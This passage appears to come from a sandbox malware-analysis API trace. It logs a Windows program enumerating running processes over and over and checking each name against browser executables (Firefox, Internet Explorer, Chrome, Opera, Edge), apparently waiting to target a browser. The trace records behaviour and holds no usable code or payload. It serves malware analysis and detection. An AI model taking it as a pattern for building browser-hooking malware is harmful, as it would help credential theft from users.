szExeFile="definitely.exe")) returned 1 [0243.371] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0243.371] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0243.371] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0243.371] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0243.372] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.372] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0243.372] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0243.372] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0243.372] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0243.372] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0243.372] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.372] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0243.373] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0243.373] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0243.373] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0243.373] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0243.373] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.373] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0243.373] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0243.373] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0243.373] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0243.373] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0243.373] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.373] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0243.374] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0243.374] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0243.374] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0243.374] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0243.374] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.374] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0243.374] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0243.374] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0243.374] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0243.374] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0243.374] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.375] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0243.375] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0243.375] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0243.375] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0243.375] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0243.375] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.375] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0243.376] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0243.376] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0243.376] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0243.376] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0243.376] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.376] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0243.376] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0243.376] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0243.376] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0243.376] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0243.376] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.376] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0243.377] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0243.377] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0243.377] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0243.377] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0243.377] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.377] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0243.377] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0243.377] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0243.377] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0243.377] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0243.377] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.377] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0243.378] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0243.378] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0243.378] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0243.378] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0243.378] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.378] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0243.379] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0243.379] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0243.379] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0243.379] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0243.379] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.379] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0243.379] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0243.379] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0243.379] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0243.379] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0243.379] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.379] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0243.380] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0243.380] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0243.380] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0243.380] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0243.380] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.380] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0243.380] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0243.380] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0243.380] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0243.380] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0243.380] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.380] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0243.381] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0243.381] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0243.381] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0243.381] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0243.381] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.381] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0243.381] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0243.381] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0243.381] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0243.381] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0243.382] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.382] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.382] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0243.382] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0243.382] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0243.382] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0243.382] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.382] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.383] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.383] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.383] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.383] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0243.383] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.383] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0243.383] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0243.383] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0243.383] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0243.383] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0243.383] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.383] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.384] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.384] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.384] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.384] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0243.384] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.384] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0243.384] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0243.385] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0243.385] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0243.385] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0243.385] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.385] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.385] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0243.385] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0243.385] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0243.385] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0243.385] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.385] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0243.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0243.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0243.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0243.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0243.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.386] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.386] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0243.386] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0243.386] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0243.386] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0243.386] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.386] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.387] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0243.387] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0243.387] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0243.387] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0243.387] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.387] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.387] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0243.387] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0243.388] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0243.388] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0243.388] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.388] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.388] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0243.388] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0243.388] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0243.388] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0243.388] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.388] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.389] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0243.389] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0243.389] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0243.389] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0243.389] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.389] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0243.389] CloseHandle (hObject=0xe8) returned 1 [0243.389] Sleep (dwMilliseconds=0x3e8) [0244.399] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0244.401] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.401] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0244.401] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0244.401] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0244.401] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0244.401] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0244.401] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0244.402] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0244.402] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0244.402] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0244.402] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0244.402] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0244.402] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0244.402] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0244.402] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0244.402] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0244.402] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0244.402] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.402] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.403] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0244.403] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0244.403] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0244.403] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0244.403] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.403] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0244.403] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0244.403] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0244.403] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0244.403] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0244.403] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.403] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.404] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0244.404] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0244.404] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0244.404] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0244.404] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.404] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 